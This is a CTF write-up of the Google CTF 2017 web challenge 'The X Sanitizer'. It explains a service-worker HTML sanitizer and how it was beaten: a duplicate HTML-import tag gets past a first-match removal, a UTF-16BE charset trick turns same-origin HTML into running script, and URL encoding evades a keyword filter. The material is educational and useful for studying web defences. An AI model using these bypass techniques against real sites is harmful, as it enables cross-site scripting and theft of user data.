Google CTF Quals 2017 - The X Sanitizer
We participated as Eat Sleep Pwn Repeat in the qualifications for Google CTF last weekend. As expected, the CTF contained some great challenges, one of them being The X Sanitizer, a medium web challenge.
Let’s get started with an overview of the web app. If you are already familiar with it, you can skip directly to the Exploitation section or look at the final payload.
Overview & Functionality
The web app served as an HTML sanitizer in which, according to the authors, harmful scripts remove themselves. The index.html simply had a text box to input a payload:
Notice that a Content Security Policy header is set to only allow same-origin scripts, objects, etc.
The main.js simply adds listeners to the buttons and makes an initial call to render():
The render() function then calls sanitize() with the content of the text box as parameter and adds the sanitized HTML to a div via the innerHTML property. The actually interesting bits of the website lie in sanitizer.js. It contains two parts: the sanitize() function and the logic to intercept fetch requests.
As you can see at [[[ 1 ]]], the sanitize() function registers the script as a service worker. Then it replaces some unwanted keywords in the HTML and creates an iframe in which it loads the /sandbox?html=XXX URL, where XXX is the HTML passed into the sanitize function as parameter. When it receives a message from the iframe, it removes the iframe and forwards the message to the callback, i.e. it returns the sanitized HTML.
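The two preparation steps described above (keyword removal and building the sandbox URL) can be sketched roughly as follows. This is not the challenge's code: the function names, the repeat-until-stable loop and the use of encodeURIComponent() are assumptions, and utf-16be is the only filtered keyword this write-up confirms.

```javascript
// Escape regex metacharacters so that keywords are matched literally.
function escapeRegExp(text) {
  return text.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
}

// Hypothetical filter: remove every keyword, case-insensitively, and repeat
// until nothing changes so that removed pieces cannot reassemble a keyword.
function stripKeywords(html, keywords) {
  const pattern = new RegExp(keywords.map(escapeRegExp).join('|'), 'ig');
  let previous;
  do {
    previous = html;
    html = html.replace(pattern, '');
  } while (html !== previous);
  return html;
}

// Assumed shape of the URL that gets loaded into the iframe.
function sandboxUrl(html) {
  return '/sandbox?html=' + encodeURIComponent(html);
}

console.log(sandboxUrl(stripKeywords('<b>hi</b>', ['utf-16be'])));
```

Looping until the string is stable matters in a filter like this: a single pass over utf-utf-16be16be would remove the inner keyword and leave a fresh utf-16be behind.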
In [[[ 2 ]]] a fetch event listener is added to intercept requests and respond based on the context. If the requested URL is the sandbox URL, it will return the response at [[[ 2 c ]]], which is the implementation of the sandbox, a simple HTML page:
Here INPUT_HTML is the parameter passed to the sandbox URL, i.e. the HTML passed to sanitize(). Finally, the X-XSS-Protection header is set to 0, so that you can’t use Chrome’s XSS auditor to block execution of <script src=sanitize></script>.
That sanitize script is loaded from /sanitize, which is served at [[[ 2 a ]]], but only if requested from inside the sandbox. After one second it will post the document.body.innerHTML of the sandbox to its parent, which in turn will forward it to the main.js script from the beginning. Furthermore, it defines a function remove() (which simply removes an element from the DOM) and uses this function as a handler for Content Security Policy violations. Finally, a new CSP header is set; this one allows scripts from any domain, but nothing else. For example, an HTML tag with some inline script would violate the CSP and get removed from the DOM.
As we have seen, when in the sandbox, the CSP allows scripts from any origin. However, the service worker will intercept those requests and respond with the script at [[[ 2 b ]]] instead of fetching the actual requested script. This replacement script removes the <script> tag that initiated the request or, if the request did not originate from a script tag, a <link rel="import"> tag instead.
And finally, if we are not in the sandbox and are not requesting the sandbox, requests are simply passed through at [[[ 2 d ]]].
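To summarize the four branches, here is a small sketch of the routing decision as a pure function. The function name, the order of the checks and the example origin are assumptions; only the four outcomes come from the description above.

```javascript
// Decide which of the four responses described above applies.
// clientUrl:  URL of the page that issued the request (may be empty)
// requestUrl: URL being requested
// origin:     origin of the sanitizer app (hypothetical example value below)
function classifyRequest(clientUrl, requestUrl, origin) {
  const isSandbox = (url) => new URL(url).pathname === '/sandbox';

  if (clientUrl && isSandbox(clientUrl)) {
    // Inside the sandbox: serve the sanitize script, or the replacement
    // script for anything else.
    return requestUrl === origin + '/sanitize' ? '2a' : '2b';
  }
  if (isSandbox(requestUrl)) {
    return '2c'; // the sandbox page itself
  }
  return '2d'; // everything else is passed through
}

const exampleOrigin = 'https://sanitizer.example';
console.log(classifyRequest(exampleOrigin + '/', exampleOrigin + '/sandbox?html=x', exampleOrigin));
```

Note that in this model a request for /sanitize from outside the sandbox simply falls through to the pass-through branch.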
Now that the functionality is out of the way, we can get to the fun part!
Exploitation
There are two problems we need to solve:
- Get some javascript payload through the sanitizer.
- Bypass the CSP of the main website, as it only allows same-origin scripts.
Sanitizer bypass
If we trigger a CSP violation inside the sandbox, the responsible DOM element will definitely get removed by this line:
There are two ways to include JavaScript without triggering the CSP inside the sandbox:
- via external scripts like <script src=//example.com></script> (remember that the CSP allows scripts from any origin).
- via HTML imports using the <link rel="import"> tag.
Note: since the sanitized HTML will eventually be added to the DOM via .innerHTML, script tags would not get executed anyway and would be useless to us.
Luckily, HTML imports are governed by the script-src CSP directive as well, so doing something like <link rel="import" href="http://example.com/"> will not violate the sandbox CSP. But the <link rel="import"> tags get removed here:
Right? Well, not really: querySelector() returns only the first matching element. By adding an additional <link rel="import">, we can make sure that the correct one will not get removed:
Using this payload, the sanitized HTML added to the DOM looks like this:
We can therefore include an HTML page, effectively bypassing the sanitizer.
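The first-match behaviour is easy to see in a toy model. The sketch below replaces the DOM with a plain array and only models a single cleanup call; the element objects, the helper names and the decoy-first ordering are illustrative assumptions, not the original payload.

```javascript
// Toy stand-in for document.querySelector(): first match or null.
function querySelectorModel(elements, matches) {
  const found = elements.find(matches);
  return found === undefined ? null : found;
}

// Model of one cleanup step: remove only the first <link rel="import">.
function removeFirstImport(elements) {
  const target = querySelectorModel(
    elements,
    (el) => el.tag === 'link' && el.rel === 'import'
  );
  return elements.filter((el) => el !== target);
}

// Hypothetical sandbox content: a decoy import followed by the one we want.
const sandboxBody = [
  { tag: 'link', rel: 'import', href: 'decoy' },
  { tag: 'link', rel: 'import', href: 'wanted' },
];

const afterCleanup = removeFirstImport(sandboxBody);
console.log(afterCleanup.map((el) => el.href)); // [ 'wanted' ]
```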
CSP bypass
Outside of the sandbox that won’t work though, since the CSP only allows same-origin scripts. And here I got stuck for a while. I tried to import the /sandbox?html= page, which changes the CSP to allow cross-domain scripts via the /sanitize script, but /sanitize is only served if requested from inside the sandbox, so that didn’t work.
I thought that there must be a way to include a useful script from the same origin. The only point where we control some output is the /sandbox?html= endpoint. However, it prepends some HTML to our output, so the response is not valid JavaScript. But <script> tags also take a charset attribute, which can force the charset of the script. It turns out that if we parse the /sandbox?html= output as UTF-16BE, the prepended HTML becomes a valid (but undefined) JavaScript identifier. We can therefore simply add a payload like =0;alert(1) (UTF-16BE encoded), and if we include it, we will see the alert popup!
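To illustrate the charset trick, the sketch below reads a byte sequence two bytes at a time, the way a UTF-16BE decoder would. The prefix <b>x is a short hypothetical stand-in for the prepended HTML (the real prefix is longer), and the helper names are made up. The sketch also assumes the prefix has an even number of bytes, so that the payload stays aligned on a two-byte boundary.

```javascript
// Encode an ASCII string as UTF-16BE: 0x00 followed by the character's byte.
function asciiToUtf16BE(text) {
  const bytes = [];
  for (const ch of text) {
    bytes.push(0x00, ch.charCodeAt(0));
  }
  return bytes;
}

// Plain ASCII bytes, one byte per character.
function asciiBytes(text) {
  return Array.from(text, (ch) => ch.charCodeAt(0));
}

// Interpret bytes as UTF-16BE: two bytes per code unit, high byte first.
function readAsUtf16BE(bytes) {
  let out = '';
  for (let i = 0; i + 1 < bytes.length; i += 2) {
    out += String.fromCharCode((bytes[i] << 8) | bytes[i + 1]);
  }
  return out;
}

const examplePrefix = '<b>x'; // hypothetical, even-length ASCII prefix
const responseBytes = asciiBytes(examplePrefix).concat(asciiToUtf16BE('=0;alert(1)'));
const seenByScriptParser = readAsUtf16BE(responseBytes);

// The four ASCII prefix bytes collapse into two characters (U+3C62, U+3E78),
// followed by the readable payload.
console.log(seenByScriptParser);
```

Each pair of ASCII bytes in the prefix turns into a single character outside the ASCII range, which is why the HTML in front of the payload can end up being read as one long identifier.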
Unfortunately, utf-16be is one of the filtered keywords:
However, there is a way to bypass it. Using the /sandbox?html= endpoint once again, we can basically request a page from the same origin with any HTML we desire. The parameter can be URL-encoded, which lets us bypass the keyword filter. For example, the following payload will import an HTML page containing a custom <meta> tag:
If you check in Chrome, you can see the imported HTML and the meta tag:
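Why URL encoding defeats the filter can be shown in a few lines. The regular expression is an assumed stand-in for the real filter (this write-up only confirms that utf-16be is filtered), and the charset="utf-16be" fragment is just a hypothetical piece of inner HTML.

```javascript
// Assumed stand-in for the keyword filter.
const keywordFilter = /utf-16be/i;

// Hypothetical fragment we want to end up inside the nested sandbox page.
const innerHtml = 'charset="utf-16be"';

// URL-encode the fragment and additionally percent-encode the keyword's last letter.
const hiddenKeyword = encodeURIComponent(innerHtml).replace('utf-16be', 'utf-16b%65');

console.log(hiddenKeyword);                      // charset%3D%22utf-16b%65%22
console.log(keywordFilter.test(hiddenKeyword));  // false
console.log(decodeURIComponent(hiddenKeyword));  // charset="utf-16be"
```

The filter only ever sees the encoded form, while the endpoint that serves the nested page decodes the parameter and restores the keyword.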
Final payload
Replacing the meta tag with something more useful, like a <script> with a custom charset, results in the following payload:
We have URL-encoded one character of utf-16be to bypass the keyword filter. All that remains now is to replace PAYLOAD with the UTF-16BE payload. Encoding ASCII strings to UTF-16BE is simple: prepend a null byte to each character. I have used the following payload:
In UTF-16BE it looked like this:
Putting it all together results in the final payload:
Note the double URL-encoding. It is necessary since that parameter is in a URL which in turn is a parameter of another URL.
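The effect of the two encoding layers can be reproduced on a tiny sample. The sketch below uses the short string =0; rather than the actual payload, and the helper name is made up for illustration.

```javascript
// Prepend a null character to each ASCII character (UTF-16BE for ASCII input).
function asciiToUtf16BEString(text) {
  return Array.from(text, (ch) => '\u0000' + ch).join('');
}

const sample = asciiToUtf16BEString('=0;');

// First layer: value of the inner URL's parameter.
const encodedOnce = encodeURIComponent(sample);
// Second layer: the inner URL is itself placed inside another URL parameter.
const encodedTwice = encodeURIComponent(encodedOnce);

console.log(encodedOnce);  // %00%3D%000%00%3B
console.log(encodedTwice); // %2500%253D%25000%2500%253B
```

Each decoding step strips one layer: the outer URL yields the single-encoded form, and the inner URL yields the raw bytes with their null bytes intact.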
The HTML generated by this payload inside Chrome:
My server then received the flag: CTF{no-problem-this-can-be-fixed-by-adding-a-single-if}
I don’t quite understand its meaning, so I’m not sure this was the intended solution :)